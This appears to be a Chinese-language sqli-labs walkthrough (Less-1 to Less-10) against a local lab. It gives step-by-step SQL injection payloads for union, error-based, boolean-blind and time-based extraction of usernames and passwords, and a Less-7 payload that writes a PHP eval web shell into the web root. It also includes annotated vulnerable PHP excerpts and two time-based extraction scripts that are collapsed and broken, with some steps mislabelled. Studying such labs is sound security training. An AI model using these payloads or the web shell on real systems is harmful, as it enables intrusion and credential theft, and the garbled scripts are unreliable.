URL:
http://127.0.0.1/sqli-labs-master/Less-1/
1.回顯正常,說明不是數字型注入
http://127.0.0.1/sqli-labs-master/Less-1/?id=1
2.回顯報錯,說明是字符型注入
http://127.0.0.1/sqli-labs-master/Less-1/?id=1'
3.回顯正常,單引號閉合成功,經過單引號閉合進行注入
http://127.0.0.1/sqli-labs-master/Less-1/?id=1' or '1'='1
4.經過逐個測試,得出字段數爲3,進行聯合注入
http://127.0.0.1/sqli-labs-master/Less-1/?id=1' order by 3--+ //回顯正常
http://127.0.0.1/sqli-labs-master/Less-1/?id=1' order by 4--+ //報錯:"Unknown column '4' in 'order clause'"
5.測試
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,3 --+ //獲得能夠回顯的字段:2,3字段
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,database(),3 --+ //獲得數據庫名爲security
6.查看全部數據庫名
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1, (select group_concat(schema_name) from information_schema.schemata),3 --+
7.查看security庫內的全部表名
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1, (select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+
8.爆出全部列名,以users爲例
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1, (select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+
9.爆破用戶名和密碼,
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1, (select group_concat(password) from security.users),(select group_concat(username) from security.users) --+
<?php //including the Mysql connect parameters.
// NOTE(review): deliberately vulnerable sqli-labs training code (Less-1 excerpt). The
// comments below mark the injection sink and what a hardened version would change.
include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables
// error_reporting(0) hides PHP warnings/notices (a failed fopen() or mysql_query()
// would otherwise print one); the MySQL error text quoted on this page is emitted by
// code later in the file, outside this excerpt.
if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connection parameters to a file for analysis.
// $id is the raw query-string value: no cast, whitelist or length check before use.
// The raw value is appended to result.txt, a relative path (typically resolved next to
// the lesson page, i.e. inside the document root); fopen()'s return value is not
// checked, and a "\n" inside $id would split one log record into two. Such a log is
// useful detection evidence, but it belongs outside the web root with tight permissions.
$fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity
// SINK: $id is interpolated into the SQL text inside single quotes, so a quote in the
// input ends the literal and the remainder is parsed as SQL (every payload on this
// page starts by closing that quote). The fix is a prepared statement with a bound
// parameter (PDO or mysqli); the legacy ext/mysql API used here has no parameter
// binding and was removed in PHP 7. Neither mysql_query() nor mysql_fetch_array() is
// checked for failure, and the if-block opened above is closed after this excerpt.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);
查數據庫名:select database()
information_schema.tables:存儲mysql數據庫下面的全部表名信息的表
table_schema:數據庫名
table_name:表名
column_name:列名
information_schema.columns:存儲mysql數據庫下面的全部列名信息的表
table_name:表名
1.測試發現屬於數字型注入,不需要進行閉合,直接進行注入
2.payload:
http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1=2 union select 1,2,3
其餘步驟同Less-1
<?php //including the Mysql connect parameters.
// NOTE(review): deliberately vulnerable sqli-labs training code (Less-2 excerpt); the
// comments mark the sink and the hardening a real application would need.
include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables
// error_reporting(0) silences PHP warnings/notices only; any MySQL error text shown
// to the client comes from code later in the file, outside this excerpt.
if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connection parameters to a file for analysis.
// $id is the raw query-string value, used without any validation. It is appended
// verbatim to result.txt (relative path, unchecked fopen() result); a "\n" in $id
// would forge an extra log line. Keep such logs outside the document root.
$fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity
// SINK: $id is dropped into the SQL text with no quotes at all, so there is no
// delimiter to close -- whatever is supplied is parsed directly as SQL (which is why
// the page calls this the "numeric" case). A cast to int, or an integer bound to a
// prepared statement, removes the sink; ext/mysql (removed in PHP 7) cannot bind.
// The query result and the fetch are not checked; the if-block closes after this excerpt.
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);
單引號與括號閉合
http://127.0.0.1/sqli-labs-master/Less-3/?id=1 //回顯正常
http://127.0.0.1/sqli-labs-master/Less-3/?id=1' //You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1
http://127.0.0.1/sqli-labs-master/Less-3/?id=1') --+ //回顯正常
<?php //including the Mysql connect parameters.
// NOTE(review): deliberately vulnerable sqli-labs training code (Less-3 excerpt),
// originally collapsed onto one line; only line breaks and comments were added.
include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables
// error_reporting(0) hides PHP warnings/notices only; the MySQL syntax error quoted
// on this page is printed by code outside this excerpt.
if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connection parameters to a file for analysis.
// Raw query-string value, no validation; appended verbatim to result.txt (relative
// path, fopen() result unchecked, "\n" in $id splits records). Keep such logs out of
// the document root.
$fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity
// SINK: $id is interpolated inside ('...'), so the input only has to close the quote
// and the parenthesis (the error message on this page, "near ''1'') LIMIT 0,1'",
// reveals exactly that wrapping). Wrapping does not sanitise; a prepared statement
// with a bound parameter does. ext/mysql was removed in PHP 7. Result and fetch are
// unchecked, and the if-block opened above closes after this excerpt.
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);
雙引號和括號閉合
http://127.0.0.1/sqli-labs-master/Less-4/?id=1") --+
//閉合成功
http://127.0.0.1/sqli-labs-master/Less-4/?id=-1") union select 1,2,3--+
//進行聯合注入
<?php //including the Mysql connect parameters.
// NOTE(review): deliberately vulnerable sqli-labs training code (Less-4 excerpt); the
// comments mark the sink and the hardening a real application would need.
include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables
// error_reporting(0) silences PHP warnings/notices only; client-visible MySQL errors,
// if any, come from code outside this excerpt.
if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connection parameters to a file for analysis.
// Raw query-string value, no validation; appended verbatim to result.txt (relative
// path, fopen() result unchecked, "\n" in $id forges extra log lines). Keep such logs
// outside the document root.
$fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity
// SINK: the value is wrapped in double quotes and then interpolated inside parentheses.
// Wrapping is not escaping -- a double quote inside the input still terminates the
// literal (the page's payload closes ") and continues with SQL). The only correct
// fix is a prepared statement with a bound parameter; ext/mysql cannot bind and was
// removed in PHP 7. Result and fetch are unchecked; the if-block closes after this excerpt.
$id = '"' . $id . '"'; $sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);
1.
http://127.0.0.1/sqli-labs-master/Less-5/?id=1 //回顯:You are in..........
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' //回顯:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
2.
法一:經過updatexml報錯注入:
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and 1=(updatexml(1,concat(0x3a,(select database())),1))%23
法二:經過floor報錯注入:
①
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+
②
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
③爆破表名
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' union select null,count(*),concat((select column_name from information_schema.columns where table_name='users' limit 0,1),floor(rand()*2))as a from information_schema.tables group by a%23
④爆破列名
http://127.0.0.1/sqli-labs-master/Less-5?id=1' union select null,count(*),concat((select column_name from information_schema.columns where table_name='users' limit 7,1),floor(rand()*2))as a from information_schema.tables group by a%23
⑤爆破username,password
http://127.0.0.1/sqli-labs-master/Less-5?id=1' union select null,count(*),concat((select username from users limit 0,1),floor(rand()*2))as a from information_schema.tables group by a%23
<?php //including the Mysql connect parameters.
// NOTE(review): deliberately vulnerable sqli-labs training code (Less-5 excerpt). Per
// this page the row itself is never echoed, only a fixed message or the MySQL error
// text -- that output code is outside this excerpt.
include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables
// error_reporting(0) hides PHP warnings/notices only; it does not stop application
// code from echoing database error messages. Returning raw DBMS errors to the client
// is what makes error-based extraction possible -- log them server-side instead.
if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connection parameters to a file for analysis.
// Raw query-string value, no validation; appended verbatim to result.txt (relative
// path, fopen() result unchecked, "\n" in $id forges extra log lines). Keep such logs
// outside the document root.
$fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity
// SINK: $id is interpolated inside single quotes; a quote in the input ends the
// literal and the rest is parsed as SQL. Use a prepared statement with a bound
// parameter (PDO/mysqli); ext/mysql cannot bind and was removed in PHP 7. Result and
// fetch are unchecked; the if-block opened above closes after this excerpt.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);
方法同Less-5,不同之處爲雙引號。
<?php //including the Mysql connect parameters.
// NOTE(review): deliberately vulnerable sqli-labs training code (Less-6 excerpt); the
// comments mark the sink and the hardening a real application would need.
include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables
// error_reporting(0) silences PHP warnings/notices only; client-visible MySQL errors,
// if any, come from code outside this excerpt.
if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connection parameters to a file for analysis.
// Raw query-string value, no validation; appended verbatim to result.txt (relative
// path, fopen() result unchecked, "\n" in $id forges extra log lines). Keep such logs
// outside the document root.
$fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity
// SINK: the value is wrapped in double quotes and interpolated into the SQL text.
// Wrapping is not escaping -- a double quote inside the input still terminates the
// literal. A prepared statement with a bound parameter is the fix; ext/mysql cannot
// bind and was removed in PHP 7. Result and fetch are unchecked; the if-block
// opened above closes after this excerpt.
$id = '"'.$id.'"'; $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);
http://127.0.0.1/sqli-labs-master/Less-7?id=1
1.
http://127.0.0.1/sqli-labs-master/Less-7?id=1')) --+ //回顯正常
2.寫入文件
http://127.0.0.1/sqli-labs-master/Less-7?id=1')) union select 1,2,'<?PHP eval($_GET["s1mpL3"])?>' into outfile "E:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\7.php" %23
<?php //including the Mysql connect parameters.
// NOTE(review): deliberately vulnerable sqli-labs training code (Less-7 excerpt). The
// page's file-write step only works because the lab's DB account holds the FILE
// privilege, secure_file_priv does not restrict the target directory, and the DB
// service can write into the web root -- each of those is a separate hardening item.
include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables
// error_reporting(0) silences PHP warnings/notices only; what the client sees is
// produced by code outside this excerpt.
if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connection parameters to a file for analysis.
// Raw query-string value, no validation; appended verbatim to result.txt (relative
// path, fopen() result unchecked, "\n" in $id forges extra log lines). Keep such logs
// outside the document root.
$fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity
// SINK: $id is interpolated inside (('...')); the extra parentheses are not a
// defence, they only change the closing sequence (the page's payload shows it).
// A prepared statement with a bound parameter is the fix; ext/mysql cannot bind and
// was removed in PHP 7. Result and fetch are unchecked; the if-block opened above
// closes after this excerpt.
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);
待更新.......
1.
http://127.0.0.1/sqli-labs-master/Less-8?id=1
有回顯
http://127.0.0.1/sqli-labs-master/Less-8?id=1'
無回顯,經過基於Bool的盲注。
2.
http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select database()) ,1,1))) = 115--+
3.判斷數據庫名長度(依次測試)
http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (length(database())) = 8 --+
4.盲注得出數據庫名security
http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select database()) ,1,1))) = 115 --+
http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select database()) ,2,1))) = 101 --+
http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select database()) ,3,1))) = 99 --+
http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select database()) ,4,1))) = 117 --+
http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select database()) ,5,1))) = 114 --+
http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select database()) ,6,1))) = 105 --+
http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select database()) ,7,1))) = 116 --+
http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select database()) ,8,1))) = 121 --+
5.判斷表名長度,
http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 --+
6.表4爲users,
http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (length((select table_name from information_schema.tables where table_schema=database() limit 3,1))) = 5 --+
http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) = 117 --+
http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,2,1))) = 115 --+
http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,3,1))) = 101 --+
http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,4,1))) = 114 --+
http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,5,1))) = 115 --+
<?php //including the Mysql connect parameters.
// NOTE(review): deliberately vulnerable sqli-labs training code (Less-8 excerpt). Per
// this page only the presence or absence of output differs between a true and a false
// condition, which is what a boolean-based blind probe needs; the output code is
// outside this excerpt. Suppressing errors does not close an injection -- the sink below does.
include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables
// error_reporting(0) silences PHP warnings/notices only.
if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connection parameters to a file for analysis.
// Raw query-string value, no validation; appended verbatim to result.txt (relative
// path, fopen() result unchecked, "\n" in $id forges extra log lines). For a blind
// probe this log holds hundreds of near-identical entries differing in one character --
// exactly the pattern to alert on -- but keep the file outside the document root.
$fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity
// SINK: $id is interpolated inside single quotes; a quote in the input ends the
// literal and the rest is parsed as SQL. Use a prepared statement with a bound
// parameter (PDO/mysqli); ext/mysql cannot bind and was removed in PHP 7. Result and
// fetch are unchecked; the if-block opened above closes after this excerpt.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);
1.肯定爲基於時間的注入
http://127.0.0.1/sqli-labs-master/Less-9?id=1' and if(1=1,sleep(5),null) --+
2.判斷數據庫長度
http://127.0.0.1/sqli-labs-master/Less-9? id=1' and if(substr(database(),1,1)='s',sleep(5),1)--+
3.判斷庫名
http://127.0.0.1/sqli-labs-master/Less-9? id=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(5), null) --+
# NOTE(review): the two lines below are a Python 2 script (print statement, xrange)
# collapsed onto single lines by extraction; the original indentation is lost, so it
# does not run as shown. As far as the tokens allow: check() appends payload to url,
# issues one GET and returns 1 only when the round trip exceeded 5 s (otherwise it
# falls off the end and returns None; the response body in content is never read).
# The nested loops then build a time-based blind probe of database() one character
# at a time and collect matches in result. The url targets Less-8 although this
# section of the page is Less-9 -- presumably a leftover path; verify.
# Detection note: such a run is a long burst of near-identical GETs to one path whose
# parameter differs by a single character and whose response times cluster near 5 s;
# that is a clear signature for WAF rules, rate limiting and slow-request alerting.
# -*- coding: utf-8 -*- import requests import time url = 'http://127.0.0.1/sqli/Less-8/?id=1' def check(payload): url_new = url + payload time_start = time.time() content = requests.get(url=url_new) time_end = time.time() if time_end - time_start >5: return 1 result = '' s = r'0123456789abcdefghijklmnopqrstuvwxyz'
# Character set s is digits plus lowercase letters only; the loop bound of 100 is an
# arbitrary maximum name length. Whether the final print sits inside or after the
# outer loop cannot be told from the collapsed text -- confirm against the source.
for i in xrange(1,100): for c in s: payload = "'and if(substr(database(),%d,1)='%c',sleep(5),1)--+" % (i,c) if check(payload): result += c break print result
# NOTE(review): Python 2 script collapsed by extraction (indentation lost; it does not
# run as shown). Same check() helper and character loop as the script above, but the
# probed expression is a table name read from information_schema.tables for the schema
# given as the hex literal 0x7365637572697479 (the bytes of 'security', the database
# name found earlier on this page). panduan is assigned but never used.
# Detection note: the request pattern is the same long burst of one-character variants
# with ~5 s responses; server-side query logs would additionally show repeated
# information_schema lookups from the application's DB account.
# -*- coding: utf-8 -*- import requests import time url = 'http://127.0.0.1/sqli/Less-8/?id=1' def check(payload): url_new = url + payload time_start = time.time() content = requests.get(url=url_new) time_end = time.time() if time_end - time_start >5: return 1 result = '' panduan = '' ll=0 s = r'0123456789abcdefghijklmnopqrstuvwxyz'
for i in xrange(1,100): for c in s: payload = "'and if(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1),%d,1)='%c',sleep(5),1)--+" % (i,c) if check(payload): result += c break
# The ll bookkeeping appears to detect an iteration in which no character matched
# (result did not grow), print the name found so far and pause on raw_input(); the
# value stored in end is never used. The intended nesting of these statements
# relative to the outer loop cannot be recovered from the collapsed text -- confirm.
if ll==len(result): print 'table_name: '+result end = raw_input('-------------') ll = len(result) print result
<?php //including the Mysql connect parameters.
// NOTE(review): deliberately vulnerable sqli-labs training code (Less-9 excerpt). Per
// this page the response content does not change at all here, so the only side
// channel left is timing (sleep()-based probes); the output code is outside this excerpt.
include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables
// error_reporting(0) silences PHP warnings/notices only.
if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connection parameters to a file for analysis.
// Raw query-string value, no validation; appended verbatim to result.txt (relative
// path, fopen() result unchecked, "\n" in $id forges extra log lines). Keep such logs
// outside the document root; their contents (plus per-request latency) are the
// evidence that identifies a time-based probe.
$fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity
// SINK: $id is interpolated inside single quotes; a quote in the input ends the
// literal and the rest is parsed as SQL. Use a prepared statement with a bound
// parameter (PDO/mysqli); ext/mysql cannot bind and was removed in PHP 7. A query
// execution timeout on the DB side limits the usefulness of sleep()-based probing
// but does not remove the sink. Result and fetch are unchecked; the if-block opened
// above closes after this excerpt.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);
同Less-9,不同之處是雙引號。
<?php //including the Mysql connect parameters.
// NOTE(review): deliberately vulnerable sqli-labs training code (Less-10 excerpt); the
// comments mark the sink and the hardening a real application would need.
include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables
// error_reporting(0) silences PHP warnings/notices only; what the client sees is
// produced by code outside this excerpt.
if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connection parameters to a file for analysis.
// Raw query-string value, no validation; appended verbatim to result.txt (relative
// path, fopen() result unchecked, "\n" in $id forges extra log lines). Keep such logs
// outside the document root.
$fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity
// SINK: the value is wrapped in double quotes and interpolated into the SQL text.
// Wrapping is not escaping -- a double quote inside the input still terminates the
// literal. A prepared statement with a bound parameter is the fix; ext/mysql cannot
// bind and was removed in PHP 7. Result and fetch are unchecked; the if-block
// opened above closes after this excerpt.
$id = '"'.$id.'"'; $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);
http://www.javashuo.com/article/p-ebmcxpzq-ek.html
http://p0desta.com/2018/01/28/Sqli_labs%E9%80%9A%E5%85%B3%E6%96%87%E6%A1%A3/